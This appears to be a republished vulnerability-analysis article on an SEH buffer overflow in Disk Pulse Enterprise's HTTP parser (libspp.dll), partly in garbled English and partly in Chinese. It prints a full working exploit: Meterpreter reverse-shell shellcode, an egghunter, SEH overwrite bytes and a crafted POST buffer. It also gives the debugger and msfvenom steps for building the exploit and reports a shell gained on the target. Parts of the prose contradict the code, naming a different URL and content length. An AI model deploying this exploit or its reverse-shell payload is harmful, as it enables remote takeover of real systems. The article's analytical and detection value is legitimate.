Home > Operation and Maintenance > Safety > How to implement vulnerability analysis of Disk Pulse Enterprise Window application

How to implement vulnerability analysis of Disk Pulse Enterprise Window application

Release: 2023-05-18 15:04:07
1216 people have browsed it

1. Vulnerability Introduction

Disk Pulse Enenterprise is a software that monitors disk changes. It can connect and manage the software through a management port 9120 or web management window 80 to monitor disk changes. There is a dynamic link library libspp.dll in Disk Pulse Enterprise, which contains some functions responsible for HTTP operations. The problem occurs in this dynamic link library. When processing the post data, because there is no strict length control on the post data, This leads to buffer overflow caused by copying data to invalid memory when executing the acquired data, triggering SEH abnormal behavior processing, and finally controlling EIP to execute arbitrary code.

Software download link: https://[www.exploit-db.com/apps/a679e77e57bf178b22bff5e86409a451-diskpulseent_setup_v9.0.34.exe](http://www.exploit-db.com/apps /a679e77e57bf178b22bff5e86409a451-diskpulseent_setup_v9.0.34.exe)

Vulnerability disclosure address: https://[www.exploit-db.com/exploits/40452](http://www.exploit-db.com/exploits /40452)

2. Experimental environment

windows 7 x86: System environment

IDA pro: Static analysis tool

Immune Debugger: Dedicated debugger for vulnerability analysis

WinDbg: Vulnerability debugger

3. Vulnerability analysis

First take a brief look at the POC, which is a more comprehensive one Buffer overflow vulnerability. The SEH structured exception handler and egghunter technology are discussed in this article.

SEH Overview

Those familiar with programming may be familiar with Structured Exception Handling (SEH), a windowing mechanism for handling hardware and software exceptions. It is usually expressed as a try/catch block of try/divide sums.

Egghunter Overview

Simply put, it is an addressing technique that executes shellcode by designing a mark and jumping to the location of another mark. The egghunter technique is necessary when the shellcode cannot be stored in the buffer.

First, let’s analyze the POC

import socket
import sys


#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
buf =  ""
buf += "\xdb\xdf\xd9\x74\x24\xf4\xba\x92\xa7\xae\xd7\x5b\x29"
buf += "\xc9\xb1\x56\x31\x53\x18\x83\xc3\x04\x03\x53\x86\x45"
buf += "\x5b\x2b\x4e\x0b\xa4\xd4\x8e\x6c\x2c\x31\xbf\xac\x4a"
buf += "\x31\xef\x1c\x18\x17\x03\xd6\x4c\x8c\x90\x9a\x58\xa3"
buf += "\x11\x10\xbf\x8a\xa2\x09\x83\x8d\x20\x50\xd0\x6d\x19"
buf += "\x9b\x25\x6f\x5e\xc6\xc4\x3d\x37\x8c\x7b\xd2\x3c\xd8"
buf += "\x47\x59\x0e\xcc\xcf\xbe\xc6\xef\xfe\x10\x5d\xb6\x20"
buf += "\x92\xb2\xc2\x68\x8c\xd7\xef\x23\x27\x23\x9b\xb5\xe1"
buf += "\x7a\x64\x19\xcc\xb3\x97\x63\x08\x73\x48\x16\x60\x80"
buf += "\xf5\x21\xb7\xfb\x21\xa7\x2c\x5b\xa1\x1f\x89\x5a\x66"
buf += "\xf9\x5a\x50\xc3\x8d\x05\x74\xd2\x42\x3e\x80\x5f\x65"
buf += "\x91\x01\x1b\x42\x35\x4a\xff\xeb\x6c\x36\xae\x14\x6e"
buf += "\x99\x0f\xb1\xe4\x37\x5b\xc8\xa6\x5f\xa8\xe1\x58\x9f"
buf += "\xa6\x72\x2a\xad\x69\x29\xa4\x9d\xe2\xf7\x33\x94\xe5"
buf += "\x07\xeb\x1e\x65\xf6\x0c\x5e\xaf\x3d\x58\x0e\xc7\x94"
buf += "\xe1\xc5\x17\x18\x34\x73\x12\x8e\x77\x2b\x0c\xe5\x10"
buf += "\x29\x51\xe8\xbc\xa4\xb7\x5a\x6d\xe6\x67\x1b\xdd\x46"
buf += "\xd8\xf3\x37\x49\x07\xe3\x37\x80\x20\x8e\xd7\x7c\x18"
buf += "\x27\x41\x25\xd2\xd6\x8e\xf0\x9e\xd9\x05\xf0\x5f\x97"
buf += "\xed\x71\x4c\xc0\x89\x79\x8c\x11\x3c\x79\xe6\x15\x96"
buf += "\x2e\x9e\x17\xcf\x18\x01\xe7\x3a\x1b\x46\x17\xbb\x2d"
buf += "\x3c\x2e\x29\x11\x2a\x4f\xbd\x91\xaa\x19\xd7\x91\xc2"
buf += "\xfd\x83\xc2\xf7\x01\x1e\x77\xa4\x97\xa1\x21\x18\x3f"
buf += "\xca\xcf\x47\x77\x55\x30\xa2\x0b\x92\xce\x30\x24\x3b"
buf += "\xa6\xca\x74\xbb\x36\xa1\x74\xeb\x5e\x3e\x5a\x04\xae"
buf += "\xbf\x71\x4d\xa6\x4a\x14\x3f\x57\x4a\x3d\xe1\xc9\x4b"
buf += "\xb2\x3a\xfa\x36\xbb\xbd\xfb\xc6\xd5\xd9\xfc\xc6\xd9"
buf += "\xdf\xc1\x10\xe0\x95\x04\xa1\x57\xa5\x33\x84\xfe\x2c"
buf += "\x3b\x9a\x01\x65"

#pop pop ret 1001A333

nseh = "\xEB\x0B\x90\x90"
seh = "\x33\xA3\x01\x10"

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

evil =  "POST /admin  HTTP/1.1\r\n"
evil += "Host:\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: textml,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 21000\r\n\r\n"
evil += "\x41" * 12292 #subtract/add for payload
evil += "w00tw00t"
evil += "\x90" * 20
evil += buf
evil += "\x90" * 50
evil += "\x42" * 1554
evil += nseh
evil += seh
evil += "\x90" * 20
evil += egghunter
evil += "\x90" * 7000

print 'Sending evil buffer...'
print 'Payload Sent!'
Copy after login

The attacker constructed an http request package. It can be seen that the post request, the url is /login, content-length: 17000. 12292 "\x41" bytes were sent, then "w00tw00t" 8 bytes were sent, then 20 "\x90" NOP bytes were sent, and then the buf was sent, plus 50 NOPs, 1614 "\ " All that's left is to fill the buffer.

Next we use Wen DBG to open the application with the vulnerable version.

如何实现Disk Pulse Eneterprise Window应用程序的漏洞分析

Send the payload and trigger the vulnerability. Enter g, the return address is overwritten, and kb looks at the stack of calls.

如何实现Disk Pulse Eneterprise Window应用程序的漏洞分析

The GetNextString function of SCA_HttpParser of libspp.dll is called here. Next, the program enters SHE abnormal behavior processing and reaches code execution by overwriting the SEH Handler.

Open IDA and analyze point 10092822. The SCA_HttpParse class in libspp is responsible for processing some HTTP-related operations. There is a function named ExtractPostData that is responsible for processing post-data. Set a breakpoint at the entrance of this function. The entry address of this function is 10092510

如何实现Disk Pulse Eneterprise Window应用程序的漏洞分析

The sending buffer uses a substitute POC, triggering the vulnerability, as shown in the following figure:

如何实现Disk Pulse Eneterprise Window应用程序的漏洞分析

Check the parameter transfer situation. The later data is passed in as the second parameter. Note that it is passed in completely. 如何实现Disk Pulse Eneterprise Window应用程序的漏洞分析

Continue single-step tracking here and reach the GetNetString function mentioned before.

如何实现Disk Pulse Eneterprise Window应用程序的漏洞分析

This function will do one thing, which is to split the first parameter, which is the later data, and separate each part for subsequent processing, step by step However, you can see that after entering GetNextString for the first time, the first data is split.

如何实现Disk Pulse Eneterprise Window应用程序的漏洞分析

The user name is separated for the first time. Next, enter GetNextString again to start splitting the second string. This splitting process will perform a series of copy operations. .

如何实现Disk Pulse Eneterprise Window应用程序的漏洞分析



如何实现Disk Pulse Eneterprise Window应用程序的漏洞分析

看一下EDX + ESI的值,可以看到,后面已经超过了开辟缓冲区的大小,后面就是无效缓冲区了。


如何实现Disk Pulse Eneterprise Window应用程序的漏洞分析CL就是将ECX的低地址一个字节一个字节拷贝,这里由于向无效地址拷贝,引发SEH异常处理,最后达到代码执行,来看一下伪代码。

如何实现Disk Pulse Eneterprise Window应用程序的漏洞分析再来看一下GetNextString函数的伪代码。

如何实现Disk Pulse Eneterprise Window应用程序的漏洞分析



如何实现Disk Pulse Eneterprise Window应用程序的漏洞分析



!mona pattern_create 20000
Copy after login

运行完在C:\日志\ FTPServer的\ pattern.txt中找到。

如何实现Disk Pulse Eneterprise Window应用程序的漏洞分析



!mona findmsp
Copy after login


如何实现Disk Pulse Eneterprise Window应用程序的漏洞分析


接下来,要寻找pop pop ret的地址

使用!mona seh

打开seh.txt日志查找指向POP POP RET序列的代码块地址。

如何实现Disk Pulse Eneterprise Window应用程序的漏洞分析


nseh =“\ xEB \ x0B \ x90 \ x90”seh =“\ x33 \ xA3 \ x01 \ x10”
Copy after login


msfvenom -a x86 --platform Windows -pwindows / meterpreter / reverse_tcp LHOST = LPORT = 4444 -ex86 / shikata_ga_nai -b'\ x00 \ x0a \ x0d \ x26'-f python -smallest
Copy after login

如何实现Disk Pulse Eneterprise Window应用程序的漏洞分析


如何实现Disk Pulse Eneterprise Window应用程序的漏洞分析




如何实现Disk Pulse Eneterprise Window应用程序的漏洞分析发送poc,触发漏洞,查看metasploit反应,输入shell,可以连到到存在漏洞主机的shell。

如何实现Disk Pulse Eneterprise Window应用程序的漏洞分析




漏洞特征:POST +任意路径+内容长度:> 14292+ | eb | +任意字节+ | 90 90 |




The above is the detailed content of How to implement vulnerability analysis of Disk Pulse Enterprise Window application. For more information, please follow other related articles on the PHP Chinese website!

Related labels:
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
Latest Downloads
Web Effects
Website Source Code
Website Materials
Front End Template